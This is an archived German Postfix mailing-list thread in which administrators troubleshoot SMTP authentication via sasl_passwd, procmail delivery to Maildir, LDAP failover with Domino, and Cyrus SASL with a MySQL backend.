[mail.tuxolino.net]: not found >> Nov 30 16:25:03 localhost postfix/smtp[4270]: smtp_sasl_passwd_lookup: no auth info found (sender=`michael at tuxolino.net', host=`mail.tuxolino.net') > > Ahjo, in der /etc/postfix/sasl_passwd (ich nehme an, die hieß bei Dir > so, wenn nicht, dann bitte im Folgenden anpassen) wird keine > Information für eine Authentifizierung am Host mail.tuxolino.net > gefunden. Da stellen sich dann die folgenden drei Fragen: > > 1. Was steht denn genau in dieser Dati (und ja, Du darfst Benutzername > und Paßwort gerne unkenntlich machen)? > 2. Wurde die Datei korrekt mit postmap sasl_passwd in eine hash-Datei > überführt, i.e., gibt es sasl_passwd.db? > 3. Was sagt denn ein "postmap -v -q mail.tuxolino.net > hash:sasl_passwd"? (Das "-v" kann man im ersten Durchgang auch gerne > mal weglassen). Ggf. den Pfad nicht vergessen ...: hash:/etc/postfix/sasl_passwd z. B. Das Passwort willst du uns nicht mitteilen genausowenig wie den usernamen. > Ich glaube, mit diesen Hinweisen und dem Verweis auf > http://www.postfix.org/SASL_README.html#client_sasl bist Du bestimmt > in der Lage, das alleine hinzukriegen. > > Ich suche jetzt mal Holsten. Viel Spass! > Ciao > Stefan -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From pinguin at tuxolino.net Fri Nov 30 17:09:39 2007 From: pinguin at tuxolino.net (pinguin at tuxolino.net) Date: Fri, 30 Nov 2007 17:09:39 +0100 (CET) Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <20071130154810.GQ12941@mail.incertum.net> References: <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> <000d01c83361$8a93b780$0565a8c0@uwe> <37926.87.122.137.152.1196435602.squirrel@www.tuxolino.net> <20071130151705.GP12941@mail.incertum.net> <35737.87.122.137.152.1196436680.squirrel@www.tuxolino.net> <20071130154810.GQ12941@mail.incertum.net> Message-ID: <44964.87.122.137.152.1196438979.squirrel@www.tuxolino.net> > Trinkt hier jemand Holsten? Irgendwer? Noe? Aber Du kommst bestimmt auch aus dem Norden ;) > Ahjo, in der /etc/postfix/sasl_passwd (ich nehme an, die hieß bei Dir > so, genau, dem 'Postfixbuch' von Peer Heinlein entlehnt. > wenn nicht, dann bitte im Folgenden anpassen) wird keine > Information für eine Authentifizierung am Host mail.tuxolino.net > gefunden. Da stellen sich dann die folgenden drei Fragen: > > 1. Was steht denn genau in dieser Dati (und ja, Du darfst Benutzername > und Paßwort gerne unkenntlich machen)? [tuxolino.net] pinguin at tuxolino.net:passwort Die E-Mailadresse ist der Benutzername > 2. Wurde die Datei korrekt mit postmap sasl_passwd in eine hash-Datei > überführt, i.e., gibt es sasl_passwd.db? Ich habe die angepassten Daten mit einem 'postmap /etc/postfix/sasl_passwd' weitergegeben. > 3. Was sagt denn ein "postmap -v -q mail.tuxolino.net > hash:sasl_passwd"? (Das "-v" kann man im ersten Durchgang auch gerne > mal weglassen). 'postmap -q mail.tuxolino.net hash:sasl_passwd*' bringt folgende Ausgabe: postmap: fatal: open database sasl_passwd*.db: No such file or directory Ich habe keine sasl_passwd.db, da vor deren Benutzung im Postfixbuch ausdruecklich gewarnt wurde. > > Ich glaube, mit diesen Hinweisen und dem Verweis auf > http://www.postfix.org/SASL_README.html#client_sasl bist Du bestimmt > in der Lage, das alleine hinzukriegen. Das werde ich mir auf jeden Fall ansehen. Herzlichen Dank fuer Deine ausdauernde und gute Hilfe! > > Ich suche jetzt mal Holsten. Viel Erfolg! ;) Ciao, Michael From pinguin at tuxolino.net Fri Nov 30 17:13:29 2007 From: pinguin at tuxolino.net (pinguin at tuxolino.net) Date: Fri, 30 Nov 2007 17:13:29 +0100 (CET) Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <4750331C.4070705@linuxrocks.dyndns.org> References: <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> <000d01c83361$8a93b780$0565a8c0@uwe> <37926.87.122.137.152.1196435602.squirrel@www.tuxolino.net> <20071130151705.GP12941@mail.incertum.net> <35737.87.122.137.152.1196436680.squirrel@www.tuxolino.net> <20071130154810.GQ12941@mail.incertum.net> <4750331C.4070705@linuxrocks.dyndns.org> Message-ID: <37706.87.122.137.152.1196439209.squirrel@www.tuxolino.net> > Stefan Förster schrieb: >> Trinkt hier jemand Holsten? Irgendwer? >> >> * pinguin at tuxolino.net wrote: >>> Nov 30 16:25:03 localhost postfix/smtp[4270]: maps_find: >>> smtp_sasl_passwd: mail.tuxolino.net: not found >>> Nov 30 16:25:03 localhost postfix/smtp[4270]: maps_find: >>> smtp_sasl_passwd: [mail.tuxolino.net]: not found >>> Nov 30 16:25:03 localhost postfix/smtp[4270]: smtp_sasl_passwd_lookup: >>> no auth info found (sender=`michael at tuxolino.net', >>> host=`mail.tuxolino.net') >> >> Ahjo, in der /etc/postfix/sasl_passwd (ich nehme an, die hieß bei Dir >> so, wenn nicht, dann bitte im Folgenden anpassen) wird keine >> Information für eine Authentifizierung am Host mail.tuxolino.net >> gefunden. Da stellen sich dann die folgenden drei Fragen: >> >> 1. Was steht denn genau in dieser Dati (und ja, Du darfst Benutzername >> und Paßwort gerne unkenntlich machen)? >> 2. Wurde die Datei korrekt mit postmap sasl_passwd in eine hash-Datei >> überführt, i.e., gibt es sasl_passwd.db? >> 3. Was sagt denn ein "postmap -v -q mail.tuxolino.net >> hash:sasl_passwd"? (Das "-v" kann man im ersten Durchgang auch gerne >> mal weglassen). > > Ggf. den Pfad nicht vergessen ...: hash:/etc/postfix/sasl_passwd z. B. > > Das Passwort willst du uns nicht mitteilen genausowenig wie den usernamen. > >> Ich glaube, mit diesen Hinweisen und dem Verweis auf >> http://www.postfix.org/SASL_README.html#client_sasl bist Du bestimmt >> in der Lage, das alleine hinzukriegen. >> >> Ich suche jetzt mal Holsten. > > Viel Spass! > >> Ciao >> Stefan > > > -- > Grüsse/Greetings > MH > > > Dont send mail to: ubecatcher at linuxrocks.dyndns.org > -- > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users > From Andre.Huebner at gmx.de Fri Nov 30 17:22:31 2007 From: Andre.Huebner at gmx.de (=?iso-8859-1?Q?Andre_H=FCbner?=) Date: Fri, 30 Nov 2007 17:22:31 +0100 Subject: [Postfixbuch-users] procmail/formail --> Maildir Message-ID: <002a01c8336d$35791a40$d11310ac@nmm.local> Hallo, mit procmail (formail)hab ich grad doch noch ein Problem an dem ich nun schon eine weile rumbastel. Mit postfix/procmail im mbox konnte ich diese procmailfilter problemlos einsetzen. Hier ein Beispiel: :0 * ^From.*gmx.de | (formail -t -I"procmail: gmx.de") >> /var/spool/mail/ein_postfach Nun, nach der Umstellung auf Maildir, habe ich das Problem das ich als Ziel statt des Postfaches für das mbox Format ja den Ordner für das Maildir angeben muß. z.B.: /home/popuser/username/Maildir/new Ich habe an der Stelle keinen Dateinamen an den ich die Ausgabe der ganzen Operation als neue Mail anhängen kann. formail beschwert sich das es einen Ordner bekommen hat. Ich habe leider aktuell keine Option gefunden dies der procmail/formail Kombination klar zu machen. Was kann ich tun? Hab ich was übersehen? Danke André From postfixusers at home.tom-krieger.de Fri Nov 30 17:29:21 2007 From: postfixusers at home.tom-krieger.de (Thomas Krieger) Date: Fri, 30 Nov 2007 17:29:21 +0100 Subject: [Postfixbuch-users] LDAP-Lookup und Ausfallsicherheit In-Reply-To: <20071129142808.GH12941@mail.incertum.net> References: <474D3E93.7040207@TMI-RZ.de> <20071129142808.GH12941@mail.incertum.net> Message-ID: <200711301729.22757.postfixusers@home.tom-krieger.de> Am Do November 29 2007 schrieb Stefan Förster: > * Thomas Stiefel wrote: > > Variante A: > > Ich könnte auf dem internen Domino-Server DOM1 im Intranet auch einen > > LDAP-Server aktivieren und diesen als 2. Ziel für den Lookup > > konfigurieren. Wobei sich hier die Frage stellt wie man das am besten > > konfiguriert. Die einfachste wäre wohl ein DNS-Alias, der auf beide > > Server zeigt und somit sollte Postfix dann hoffentlich automatisch auf > > DOM1 zugreifen, wenn DOM2 down ist. > > > > Variante B: > > Ich habe in einer Mail von Sandy gelesen, dass man wohl auch per Script > > das LDAP-Directory abfragen und das Ergebnis in eine Hash-DB schreiben > > kann. Es müsste hier allerdings neben der Internet-Adresse auch das Feld > > Kurzname aus dem Domino-Directory mit abgefragt werden. > > > > Die LDAP-Query für Postfix lautet: query_filter = > > (|(mail=%s)(uid=%u)(uid=%s)) > > In der DMZ einen OpenLDAP hinstellen und die Daten vom Domino > replizieren lassen fällt wohl aus, oder? Das wäre auch mein Ansatz. Wenn der Domino-Server Ldap-Replikation beherrscht, baue auf den Postfix Servern einen OpenLDAP Server auf, richte den als Slave ein und lasse ihn vom Master, dem Domino-Server beschicken. Das Thema Sicherheit sollte auch nicht problematisch werden, da der Zugriff vom Master von innen in die DMZ nach außen geht. Wenn Der OpenLDAP noch mit ACLs gesichert wird und Authentifizierung notwendig ist, können die Daten nicht so ohne weiteres abgefragt werden. Außerdem kannst Du den LDAP, wenn er auf derselben Maschine läuft wie der Postfix, auf 127.0.0.1 lauschen lassen. Servus Thomas From ml at awinkelmann.de Fri Nov 30 18:00:54 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Fri, 30 Nov 2007 18:00:54 +0100 Subject: [Postfixbuch-users] Grossbuchstaben in Usernamen In-Reply-To: References: Message-ID: <200711301800.55422.ml@awinkelmann.de> On Freitag, 30. November 2007, lars wrote: > mal ne frage am rande: gibt es eine möglichkeit, Postfix daran zu > hindern, empfängernamen auf kleinbuchstaben zu setzen? > > es ist sicher ohnehin nicht sehr sinnvoll, user-XX@ statt user-xx@ zu > verwenden; wenn ich aber einen benutzeraccount mit grossbuchstaben > habe, gibt postfix mir eine "User unknown"-meldung, weil es aus user- > XX user-xx macht und den nicht in den tables findet - da steht ja > auch user-XX ... Wietse hat vor einiger Zeit mal Postfix geändert um den local-part beizubehalten und nicht die Gross-/Kleinschreibung zu verändern. Entweder benutzt Du eine Uralt Postfix Version oder Du hast die Veränderung selber reinkonfiguriert. Prüf das. -- Andreas From driessen at fblan.de Fri Nov 30 19:08:31 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 30 Nov 2007 19:08:31 +0100 Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <44964.87.122.137.152.1196438979.squirrel@www.tuxolino.net> References: <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net><000d01c83361$8a93b780$0565a8c0@uwe><37926.87.122.137.152.1196435602.squirrel@www.tuxolino.net><20071130151705.GP12941@mail.incertum.net><35737.87.122.137.152.1196436680.squirrel@www.tuxolino.net><20071130154810.GQ12941@mail.incertum.net> <44964.87.122.137.152.1196438979.squirrel@www.tuxolino.net> Message-ID: <001a01c8337c$0490d120$0565a8c0@uwe> pinguin at tuxolino.net schrieb: > > 1. Was steht denn genau in dieser Dati (und ja, Du darfst Benutzername > > und Paßwort gerne unkenntlich machen)? > [tuxolino.net] pinguin at tuxolino.net:passwort > Die E-Mailadresse ist der Benutzername > > 2. Wurde die Datei korrekt mit postmap sasl_passwd in eine hash-Datei > > überführt, i.e., gibt es sasl_passwd.db? > Ich habe die angepassten Daten mit einem 'postmap > /etc/postfix/sasl_passwd' weitergegeben. > > 3. Was sagt denn ein "postmap -v -q mail.tuxolino.net > > hash:sasl_passwd"? (Das "-v" kann man im ersten Durchgang auch gerne > > mal weglassen). > 'postmap -q mail.tuxolino.net hash:sasl_passwd*' bringt folgende Ausgabe: > postmap: fatal: open database sasl_passwd*.db: No such file or directory > Ich habe keine sasl_passwd.db, da vor deren Benutzung im Postfixbuch > ausdruecklich gewarnt wurde. > > Jetzt bekommste auch Tiernamen von mir Lies noch mal genau das Buch von Peer und lass dich nicht von Ihm erwischen mit der Aussage. PUNKT 2 beachten PUNKT 2 beachten PUNKT 2 beachten Tu das was dort steht und lass es auch stehen und schau nach ob die Datei auch von Postfix bzw. SASl angesprochen werden kann. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From postfixbuch at cboltz.de Fri Nov 30 20:20:38 2007 From: postfixbuch at cboltz.de (Christian Boltz) Date: Fri, 30 Nov 2007 20:20:38 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend In-Reply-To: <474E7DE2.2000000@puersten.de> References: <474DBD57.5000203@puersten.de> <20071129080001.GA10665@state-of-mind.de> <474E7DE2.2000000@puersten.de> Message-ID: <200711302020.39374@tux.boltz.de.vu> Hallo Oliver, hallo Leute, Am Donnerstag, 29. November 2007 schrieb Oliver Pürsten: > Patrick Ben Koetter schrieb: ... > > Was sagt Dein MySQL-Log, wenn Du mit sample-server authen willst? ... > die idee mit dem mysqld querry log hatte ich noch nicht. interessant > ist das da nix ankommt wenn ich die anfrage stelle. Liegt wohl daran, dass das Query Log standardmäßig ausgeschaltet ist. Ist auch gut so, weil es eine nennenswerte Datenmenge produziert und auch für die Performance nicht gerade förderlich ist ;-) Zum Einschalten die /etc/my.cnf ergänzen: # Im Abschnitt [mysqld] log = /var/log/mysql-query.log Gruß Christian Boltz -- Leider ist hier nicht SuSe Talk [...], denn sonst würde ich hier diese Trolls, ...... unter einen solchen Psychoterror setzen, dass die die Alkaida Sprengen hehe..... [Thilo Alfred Bätzig in suse-linux] From postfixbuch at cboltz.de Fri Nov 30 20:33:00 2007 From: postfixbuch at cboltz.de (Christian Boltz) Date: Fri, 30 Nov 2007 20:33:00 +0100 Subject: [Postfixbuch-users] Speicherverbrauch POP/IMAP-Sitzung bei Courier/ Mails in Amavis/Postfix In-Reply-To: <474DBE0F.9010808@japantest.homelinux.com> References: <474D177C.7070305@thomas-schwenski.de> <20071128121208.62c229ca@gamma.meyer.home> <474DBE0F.9010808@japantest.homelinux.com> Message-ID: <200711302033.00997@tux.boltz.de.vu> Hallo Sandy, hallo Leute, Am Mittwoch, 28. November 2007 schrieb Sandy Drobic: ... > Ganz einfach scheint es nicht zu sein, den Speicherverbrauch von > Postfix präzise zu berechnen. Blöde frage: Spricht irgendwas gegen free rcpostfix stop # ggf. rcamavisd stop usw. free (+ einen guten Taschenrechner, um die Differenz zu ermitteln) ? ;-) Gruß Christian Boltz -- > Hier hab ich gerade noch was gefunden, was ist denn bitte > ein Dialerzwang? Ein guter Grund zu einem anderen Provider zu wechseln. [> Eric Scheen und Arvin Schnell in suse-linux] From Juergen.Lloyd at indaal.de Fri Nov 30 20:54:17 2007 From: Juergen.Lloyd at indaal.de (Juergen.Lloyd at indaal.de) Date: Fri, 30 Nov 2007 20:54:17 +0100 Subject: [Postfixbuch-users] LDAP-Lookup und Ausfallsicherheit In-Reply-To: <474E5E2E.1010804@TMI-RZ.de> Message-ID: Wir haben dieses Thema bei uns und verschiedenen Kunden anders gelöst: Mit einem kleinen Agenten exportieren wir eine passende Liste aller "gültigen" MailAdressen aus dem Domino Adressbuch. Diese Liste wird dann in Postfix in einer Restrictions-Liste eingebunden. Vorteile: Keine Last auf dem Domino System. Die indizierte Datei steht postfix immer zur Verfügung (auch wenn Domino mal nicht läuft). Kein LDAP task auf dem Domino Server und auch kein andere LDAP-Server (wenn der nicht aus anderen Gründen benötigt wird). Der Agent kann so angepasst werden, dass wahlweise auch gewünschte Gruppen- und Mail-In-Datenbank-Adressen exportiert werden. Die exportierte Datei kann wahlweise von Domino auf Platte geschrieben und dann irgendwie zum Postfix-Server transportiert werden oder auch (noch eleganter) mit einem Script auf dem Postfix-Server wird per wget via http der Domino-Servers kontaktiert. Dort gibt der Agent die passende Liste als ANtwort. Das Script kann danach auch noch gleich per postmap den Index erstellen und postfix "reloaden". Mit freundlichen Grüßen, Jürgen Lloyd ____________________________________ Indaal Information Management GmbH EMail: juergen.lloyd at indaal.de ____________________________________ From ml at awinkelmann.de Fri Nov 30 21:17:20 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Fri, 30 Nov 2007 21:17:20 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend In-Reply-To: <474FC44D.5020100@puersten.de> References: <474DBD57.5000203@puersten.de> <200711290614.57725.ml@awinkelmann.de> <474FC44D.5020100@puersten.de> Message-ID: <200711302117.20398.ml@awinkelmann.de> On Freitag, 30. November 2007, Oliver Pürsten wrote: > >>> Also was ich brauch, wenn ich die Abfrage richig verstehe, ist der > >>> komplette übergebene username. Im meinem Falls ist es so das username = > >>> emailadresse ist. Sprich die Tabelle sasl sieht wie folgt aus: > >>> > >>> mysql> select * from sasl; > >>> +---------------+----------+ > >>> > >>> | username | password | > >>> > >>> +---------------+----------+ > >>> > >>> | test1 at test.de | test | > >>> > >>> +---------------+----------+ > >> > >> Okay, dann passe die sql_select entsprechend an in smtpd.conf: > >> sql_select: SELECT password FROM sasl WHERE username = '%s' > > > > Es gibt kein %s. Der OP müsste das mit '%u@%r' lösen. > > Hatte ich auch schon ausprobiert, leider bringt das aber auch kein > Ergebnis. > > Ich denke das Grundproblem wird sein das die Anfrage, warum auch immer, > nicht in der Datenbank ankommt. > > Irgentwer noch ne Idee wieso die Anfrage nicht an die Datenbank > weitergegeben wird? Die Cyrus-SASL Config-Datei wird nicht gelesen (sie liegt im falschen Verzeichnis) oder das sql-Plugin ist nicht richtig erstellt. -- Andreas From anmeyer at anup.de Fri Nov 30 21:46:33 2007 From: anmeyer at anup.de (Andreas Meyer) Date: Fri, 30 Nov 2007 21:46:33 +0100 Subject: [Postfixbuch-users] Speicherverbrauch POP/IMAP-Sitzung bei Courier/ Mails in Amavis/Postfix In-Reply-To: <200711302033.00997@tux.boltz.de.vu> References: <474D177C.7070305@thomas-schwenski.de> <20071128121208.62c229ca@gamma.meyer.home> <474DBE0F.9010808@japantest.homelinux.com> <200711302033.00997@tux.boltz.de.vu> Message-ID: <20071130214633.3a002851@gamma.meyer.home> Christian Boltz schrieb: > Hallo Sandy, hallo Leute, > > Am Mittwoch, 28. November 2007 schrieb Sandy Drobic: > ... > > Ganz einfach scheint es nicht zu sein, den Speicherverbrauch von > > Postfix präzise zu berechnen. > > Blöde frage: Spricht irgendwas gegen > > free > rcpostfix stop > # ggf. rcamavisd stop usw. > free > (+ einen guten Taschenrechner, um die Differenz zu ermitteln) Es könnte ja z.B. sein, dass zu dieser Zeit andere Prozesse gestartet oder gestoppt werden und so unmittelbar ebenfalls auf die Ausgabe von free Einfluss haben. Wobei mir persönlich der Unterschied zwischen z.B. buffers und cached noch nie so ganz klar waren. total used free shared buffers cached Mem: 386156 365512 20644 0 15736 111080 -/+ buffers/cache: 238696 147460 Swap: 530104 128 529976 -- Andreas Meyer Mein öffentlicher GPG-Schlüssel unter: http://gpg-keyserver.de/pks/lookup?search=anmeyer&fingerprint=on&op=index